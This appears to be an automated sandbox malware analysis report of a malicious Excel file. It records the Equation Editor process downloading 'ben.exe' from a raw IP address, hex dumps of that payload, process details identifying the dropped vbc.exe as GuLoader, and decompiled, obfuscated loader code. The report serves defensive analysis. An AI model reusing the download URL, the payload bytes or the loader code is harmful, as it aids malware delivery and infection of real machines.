Sep 13, 2021 20:58:57.758028984 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758030891 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758047104 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758057117 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758065939 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758083105 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758102894 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758126020 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758127928 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758138895 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758153915 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.758171082 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.758193016 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761334896 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761409044 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761440992 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761457920 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761472940 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761488914 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761503935 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761508942 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761528969 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761550903 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761621952 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761652946 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761668921 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761684895 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761698008 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761703014 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761713982 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761717081 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761729956 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761739016 CEST	80	49167	172.245.26.190	192.168.2.22
Sep 13, 2021 20:58:57.761765003 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.761782885 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:57.762547970 CEST	49167	80	192.168.2.22	172.245.26.190
Sep 13, 2021 20:58:58.423096895 CEST	49167	80	192.168.2.22	172.245.26.190

HTTP Request Dependency Graph

172.245.26.190

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	172.245.26.190	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2021 20:58:57.192261934 CEST	0	OUT	GET /gen/ben.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 172.245.26.190 Connection: Keep-Alive
Sep 13, 2021 20:58:57.306423903 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 13 Sep 2021 18:58:54 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 13 Sep 2021 12:47:12 GMT ETag: "20000-5cbdfdd2ef7af" Accept-Ranges: bytes Content-Length: 131072 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f ad a0 db 0b cc ce 88 0b cc ce 88 0b cc ce 88 88 d0 c0 88 0a cc ce 88 44 ee c7 88 08 cc ce 88 3d ea c3 88 0a cc ce 88 52 69 63 68 0b cc ce 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 b3 c4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 50 00 00 00 00 00 00 74 15 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 04 00 04 00 00 00 00 00 00 00 00 10 02 00 00 10 00 00 e2 83 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 b7 01 00 28 00 00 00 00 e0 01 00 8b 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 19 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8b 29 00 00 00 e0 01 00 00 30 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OD=RichPELJPt@()( 0.text `.data@.rsrc)0@@IMSVBVM60.DLL
Sep 13, 2021 20:58:57.306458950 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2021 20:58:57.306482077 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2021 20:58:57.306505919 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 13, 2021 20:58:57.419075966 CEST	7	IN	Data Raw: 41 00 07 00 08 00 90 b7 41 00 b4 b7 41 00 97 b7 41 00 ff 25 74 10 40 00 ff 25 a8 10 40 00 ff 25 b8 10 40 00 ff 25 5c 10 40 00 ff 25 48 10 40 00 ff 25 dc 10 40 00 ff 25 2c 10 40 00 ff 25 ec 10 40 00 ff 25 64 10 40 00 ff 25 e8 10 40 00 ff 25 e0 10 Data Ascii: AAAA%t@%@%@%\@%H@%@%,@%@%d@%@%@%@%@%@%8@%@%@%@% @%@%l@%@%@%@%@%@%@%@%p@%@%4@%@%@%@%(@%D@%@%X
Sep 13, 2021 20:58:57.419106007 CEST	8	IN	Data Raw: 8f 9d 73 db 4d d4 51 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 02 00 00 00 00 00 00 c4 15 40 00 4c 00 00 00 50 00 00 00 48 d1 14 91 b1 a1 ac 40 94 78 Data Ascii: sMQDI@LPH@xA7G/@PuMOJH/@t%@\yA
Sep 13, 2021 20:58:57.419146061 CEST	10	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @t%@yA%@A@@&@@@@@hl @AN*(/.X&@&@@4
Sep 13, 2021 20:58:57.419181108 CEST	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @p@Z@`@f@$%@< @p@Z@
Sep 13, 2021 20:58:57.419398069 CEST	13	IN	Data Raw: e0 68 64 28 40 00 b8 40 14 40 00 ff d0 ff e0 00 00 00 09 00 00 00 6b 65 72 6e 65 6c 33 32 00 00 00 00 17 00 00 00 52 65 67 69 73 74 65 72 53 65 72 76 69 63 65 50 72 6f 63 65 73 73 00 00 9c 28 40 00 ac 28 40 00 00 00 04 00 b0 c3 41 00 00 00 00 00 Data Ascii: hd(@@@kernel32RegisterServiceProcess(@(@AAth(@@@advapi32.dllRegOpenKeyA(@)@AAth)@@@ultramelancholySangriaer8Styrkedrik6l
Sep 13, 2021 20:58:57.419428110 CEST	14	IN	Data Raw: 74 00 00 00 5f 5f 76 62 61 56 61 72 41 64 64 00 5f 5f 76 62 61 56 61 72 4d 6f 76 65 00 00 00 00 5f 5f 76 62 61 46 72 65 65 53 74 72 00 00 00 00 5f 5f 76 62 61 53 74 72 43 6f 70 79 00 00 00 00 a4 29 40 00 c8 c3 41 00 5f 5f 76 62 61 55 49 31 49 32 Data Ascii: t__vbaVarAdd__vbaVarMove__vbaFreeStr__vbaStrCopy)@A__vbaUI1I2__vbaGenerateBoundsError__vbaFreeVarList__vbaHresultCheck__vbaVarDup__vbaVarTstNe__vbaFreeObj__vbaHresultCheckObj__vbaNew2__vbaAryCon
Sep 13, 2021 20:58:57.419441938 CEST	15	IN	Data Raw: cf ce 4d 3d 0c e2 c8 f5 32 0f 67 ce 92 40 42 2a 49 05 8d 05 86 00 19 40 30 a5 8c 05 5b 25 57 1e 15 0b 81 4c b8 15 96 8a b2 04 92 45 12 08 04 42 10 03 16 0c 04 1a 09 2e 05 df 5f 3d d8 73 55 cf 7d 0b 39 27 1a e8 b7 30 4d 65 e7 f5 0e a5 1d 8a 6b e7 Data Ascii: M=2g@B*I@0[%WLEB._=sU}9'0Mek\zyus+-w%k[MYuqNl.UQYYVzg\g{</FN,uu3t&oG>SbNvuOOw,\|JA%H`` VRBcH@H

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3028 Parent PID: 596

General

Start time:	20:58:34
Start date:	13/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fbc0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1232 Parent PID: 596

General

Start time:	20:58:57
Start date:	13/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2140 Parent PID: 1232

General

Start time:	20:58:59
Start date:	13/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	652E9A32D7FDC6783BC63C097D8ACF74
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 16%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2140 Parent PID: 1232 vbc.exeCOMMON

Executed Functions

Function 00401574, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 295
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			_entry_(signed int __eax, signed int __ebx, signed char __ecx, intOrPtr* __edx, signed int __edi) {
				signed int _t110;
				void* _t111;
				intOrPtr* _t112;
				signed int _t113;
				signed char _t115;
				signed int _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				signed int _t119;
				signed char _t120;
				signed int _t121;
				signed char _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				signed int _t125;
				intOrPtr* _t127;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t140;
				signed int _t142;
				signed char _t146;
				signed char _t148;
				void* _t150;
				signed int _t151;
				signed int _t153;
				signed int _t154;
				signed char _t157;
				signed int _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				signed char _t166;
				intOrPtr* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t173;
				signed int _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t188;
				intOrPtr _t200;
				intOrPtr _t209;
				signed int _t211;
				signed int _t216;
				signed char _t221;

				_t174 = __edi;
				_t172 = __edx;
				_t166 = __ecx;
				_t158 = __ebx;
				_push("VB5!6&*"); // executed
				L0040156C(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t110 = __eax + 1;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *((intOrPtr*)(__ecx + 0xe)) =  *((intOrPtr*)(__ecx + 0xe)) + _t110;
				 *(_t185 + 0x451aabe9) =  *(_t185 + 0x451aabe9) ^ 0xffffffbf;
				asm("cmpsd");
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *__ecx =  *__ecx + _t110;
				 *_t110 =  *_t110 + _t110;
				 *_t110 =  *_t110 + _t110;
				 *((intOrPtr*)(_t110 + _t110)) =  *((intOrPtr*)(_t110 + _t110)) + _t110;
				 *_t110 =  *_t110 + _t110;
				while(1) {
					_t174 = _t174 + 1;
					asm("outsd");
					if(_t174 >= 0) {
						break;
					}
					_t181 =  *(_t110 + 0x65) * 0x59003872;
					 *_t110 =  *_t110 + _t110;
					 *_t110 =  *_t110 + _t110;
					 *_t110 =  *_t110 + _t110;
					 *_t110 =  *_t110 + _t110;
					asm("int3");
					 *_t110 =  *_t110 ^ _t110;
					_t157 = _t110 | 0x0000000d;
					_t110 = _t158 + _t158;
					_pop(_t158);
					_push(_t172);
					asm("sbb [bp+si-0x70bb], dh");
					asm("popfd");
					if(_t157 >= 0) {
						continue;
					} else {
						_t185 = _t185 - 1;
						asm("aam 0x51");
						_t188 = _t188 + 1;
						asm("clc");
						if(_t185 == 0) {
							asm("invalid");
							asm("popfd");
							asm("scasd");
							_t188 = _t188 + 1;
							_t12 = _t110;
							_t110 = _t174;
							_t174 = _t12;
							_t158 = _t158 ^  *(_t166 - 0x48ee309a);
							asm("cdq");
							asm("iretw");
							asm("adc [edi+0xaa000c], esi");
							asm("pushad");
							asm("rcl dword [ebx], cl");
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t110 =  *_t110 + _t110;
							asm("lock add [eax], eax");
							 *_t174 =  *_t174 + _t110;
							 *_t110 =  *_t110 + _t110;
							 *_t166 =  *_t166 + _t166;
							break;
						}
					}
					L7:
					if(_t200 < 0) {
						_t158 = _t158 +  *_t172;
						 *_t110 =  *_t110 + _t110;
						 *_t158 =  *_t158 + _t110;
						_push(es);
						_t24 = _t166 + 0x6d + _t185 * 2;
						 *_t24 =  *((intOrPtr*)(_t166 + 0x6d + _t185 * 2)) + _t172;
						if( *_t24 < 0) {
							L21:
							if (_t211 >= 0) goto L22;
							asm("adc al, [edx]");
							_t158 = _t158 + _t158;
							_t188 = _t188 +  *0x5000000;
							_t111 = _t110 + 0x78655400;
							if(_t111 != 0) {
								 *_t172 =  *_t172 + _t111;
								_t150 = _t111 + 0xf8;
								_pop(es);
								asm("enter 0xbf0a, 0x4");
								_t151 = _t150 + 0xef;
								 *_t158 =  *_t158 + _t166;
								_push(es);
								 *((intOrPtr*)(_t158 + 0x4f)) =  *((intOrPtr*)(_t158 + 0x4f)) + _t151;
								_t175 = _t174 + 1 - 1;
								_t181 = _t181 - 1;
								_push(_t158);
								 *_t172 =  *_t172 + _t172;
								_push(es);
								_t185 = _t185 +  *_t151;
								 *_t151 =  *_t151 + _t151;
								 *_t181 =  *_t181 + _t151;
								 *_t151 =  *_t151 | _t151;
								_t158 = _t158 + _t158 + 1;
								asm("outsd");
								asm("insd");
								asm("insd");
								asm("popad");
								asm("outsb");
								 *[fs:eax] =  *[fs:eax] ^ _t151;
								_t113 = _t151 + 1;
								_push(es);
								_t35 = _t158 + 0x72;
								 *_t35 =  *((intOrPtr*)(_t158 + 0x72)) + _t113;
								asm("outsd");
								if ( *_t35 != 0) goto L32;
							}
							asm("arpl [eax], bp");
						} else {
							 *_t158 =  *_t158 + _t166;
							_pop(es);
							asm("clc");
							_pop(es);
							 *_t110 =  *_t110 + _t110;
							_t110 = _t110 | _t166 |  *(_t110 | _t166);
							_t158 = _t158 + _t158;
							_t185 = _t185 +  *_t172;
							 *_t110 =  *_t110 + _t110;
							_t30 = _t110 + 0x78655400;
							 *_t30 =  *((intOrPtr*)(_t110 + 0x78655400)) + _t110;
							_t209 =  *_t30;
							_push(_t188);
							if(_t209 < 0) {
								_t112 = _t110 + 0x78655400;
								if(_t112 == 0) {
									L31:
									asm("clc");
									_pop(es);
									asm("enter 0xbf0a, 0x4");
									asm("out dx, eax");
									_t175 = _t174 + _t174;
									_t188 = _t188 +  *_t158;
									 *_t112 =  *_t112 + _t112;
									 *_t166 =  *_t166 + _t166;
									_t113 = _t112 + 0x6e694c00;
									 *[gs:eax] =  *[gs:eax] ^ _t113;
									 *_t175 =  *_t175 + _t172;
									_t176 = _t175 + _t113;
									_pop(es);
									 *_t113 =  *_t113 + _t113;
									_t115 = _t113 + 0x000000c8 |  *(_t113 + 0xc8);
									 *0xca8 =  *0xca8 + _t115;
									_push(es);
									 *_t115 =  *_t115 + _t115;
									 *_t158 =  *_t158 + 1;
									asm("sbb [eax], eax");
									 *_t115 =  *_t115 + _t115;
									_t116 = _t115 |  *_t181;
									_t41 = _t158 + 0x68;
									 *_t41 =  *((intOrPtr*)(_t158 + 0x68)) + _t172;
									asm("popad");
									if( *_t41 < 0) {
										goto L37;
									} else {
										 *_t116 =  *_t116 ^ _t116;
										_t142 = _t116 + 0xf8;
										es = ss;
										asm("enter 0xbf0a, 0x4");
										asm("out dx, eax");
										_t188 = _t188 +  *_t181;
										 *_t142 =  *_t142 + _t142;
										 *_t158 =  *_t158 + _t166;
										_push(es);
										goto L34;
									}
								} else {
									 *_t172 =  *_t172 + _t112;
									_pop(es);
									asm("enter 0xbf0a, 0x4");
									asm("out dx, eax");
									 *_t158 =  *_t158 + _t166;
									_t142 = _t112 + 0x000000f8 | 0x6d657200;
									_t216 = _t142;
									if(_t216 < 0) {
										L34:
										 *((intOrPtr*)(_t166 + 0x62)) =  *((intOrPtr*)(_t166 + 0x62)) + _t166;
										asm("gs insb");
										 *_t142 =  *_t142 ^ _t142;
										 *_t166 =  *_t166 + _t142;
										_push(es);
										 *((intOrPtr*)(_t158 + 0x6f)) =  *((intOrPtr*)(_t158 + 0x6f)) + _t166;
										asm("outsb");
										asm("outsd");
										asm("insd");
										_t176 = 0x1201ef04;
										 *_t158 =  *_t158 + 1;
										_t146 = (_t142 ^  *_t142) + 0xac807f8 +  *((intOrPtr*)((_t142 ^  *_t142) + 0xac807f8)) -  *((intOrPtr*)((_t142 ^  *_t142) + 0xac807f8 +  *((intOrPtr*)((_t142 ^  *_t142) + 0xac807f8))));
										 *_t146 =  *_t146 + _t146;
										 *((intOrPtr*)(_t166 + 0x62)) =  *((intOrPtr*)(_t166 + 0x62)) + _t166;
										asm("gs insb");
										_t148 = (_t146 | 0x00000006) ^  *(_t146 | 0x00000006);
										 *_t166 =  *_t166 + _t148;
										_t122 = _t148 |  *_t148;
										_t221 = _t122;
										_push(0x1201ef04);
										_push(0x6f777069);
										if(_t221 >= 0) {
											if(_t221 < 0) {
												 *0xac807f8 =  *0xac807f8 + _t122;
												_t176 = 0x1201ef04;
												_pop(es);
												_t158 = _t158 + _t158;
												_t116 = _t122 +  *((intOrPtr*)(_t122 + _t122));
												 *_t116 =  *_t116 + _t116;
												_push(es);
												L37:
												 *_t116 =  *_t116 + _t116;
												 *_t116 =  *_t116 + _t116;
												_t117 = _t116 + 1;
												 *_t176 =  *_t176 + _t117;
												 *_t117 =  *_t117 + _t117;
												 *((intOrPtr*)(_t166 + _t185)) =  *((intOrPtr*)(_t166 + _t185)) + _t158;
												_t118 = _t117 + 1;
												 *_t176 =  *_t176 + _t118;
												 *_t118 =  *_t118 + _t118;
												_t119 = _t118 + _t118;
												 *_t119 =  *_t119 - _t119;
												_pop(es);
												 *_t119 =  *_t119 + _t119;
												 *((intOrPtr*)(_t119 + _t185 + 0x40)) =  *((intOrPtr*)(_t119 + _t185 + 0x40)) + _t119;
												 *((intOrPtr*)(_t181 + 0x42)) =  *((intOrPtr*)(_t181 + 0x42)) + _t172;
											}
											_t172 = _t172 + 1;
											_t120 = _t119 ^ 0x2a263621;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t181 =  *_t181 + _t158;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											 *_t120 =  *_t120 + _t120;
											_t121 = _t120 |  *_t120;
											 *(_t121 + _t121) =  *(_t121 + _t121) | _t121;
											 *_t121 =  *_t121 + _t121;
											 *_t121 =  *_t121 + _t121;
											 *_t121 =  *_t121 + _t121;
											 *_t121 =  *_t121 + _t121;
											 *((intOrPtr*)(_t188 + _t158)) =  *((intOrPtr*)(_t188 + _t158)) + _t172;
											_t122 = _t121 + 1;
											 *_t181 =  *_t181 + _t172;
											asm("clc");
										}
									} else {
										asm("popad");
										asm("arpl [ebp+0x72], sp");
										if (_t216 >= 0) goto L30;
										asm("adc al, [eax]");
										_t158 = _t158 + _t158 +  *_t166;
										 *_t142 =  *_t142 + _t142;
										 *_t142 =  *_t142 + _t166;
										_push(es);
										 *((intOrPtr*)(_t166 + 0x6d)) =  *((intOrPtr*)(_t166 + 0x6d)) + _t166;
										asm("popad");
										 *[gs:bx+si] =  *[gs:bx+si] ^ _t142;
										asm("sbb [ebx], al");
										goto L31;
									}
								}
							} else {
								_t153 = _t110 ^  *_t110;
								 *_t172 =  *_t172 + _t153;
								_t154 = _t153 + 0x81;
								_pop(es);
								_t166 = _t166 + 1;
								 *_t154 =  *_t154 | _t154;
								_push(es);
								asm("out dx, eax");
								 *_t158 =  *_t158 + _t166;
								_t110 = _t154 |  *_t154;
								asm("popad");
								asm("fs insd");
								_t181 =  *(_t172 + 0x61) * 0x6569746c;
								_t211 = _t181;
								goto L21;
							}
						}
					} else {
						asm("gs outsb");
					}
					_t159 = _t158 + _t158;
					asm("invalid");
					 *_t122 =  *_t122 | _t122;
					 *_t122 =  *_t122 + _t122;
					 *_t122 =  *_t122 + _t122;
					 *_t122 =  *_t122 + _t122;
					_t123 = _t122 +  *_t122;
					 *_t123 =  *_t123 + _t123;
					goto 0xcc40187d;
					asm("sbb [eax], al");
					asm("adc [eax], bl");
					_t124 = _t123 + 1;
					 *((intOrPtr*)(_t124 + 0x78004015)) =  *((intOrPtr*)(_t124 + 0x78004015)) + _t124;
					 *_t124 =  *_t124 + _t124;
					 *((intOrPtr*)(_t185 - 0x71000000)) =  *((intOrPtr*)(_t185 - 0x71000000)) + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t172;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *_t124 =  *_t124 + _t124;
					 *((intOrPtr*)(_t166 + 0x55)) =  *((intOrPtr*)(_t166 + 0x55)) + _t124;
					_push(_t188);
					_t178 = _t176 - 1 + 1;
					_push(_t172);
					_push(_t124);
					_t125 = _t124 - 1;
					_t168 = _t166 + 1 - 1;
					_push(_t159);
					_t186 = _t185 - 1;
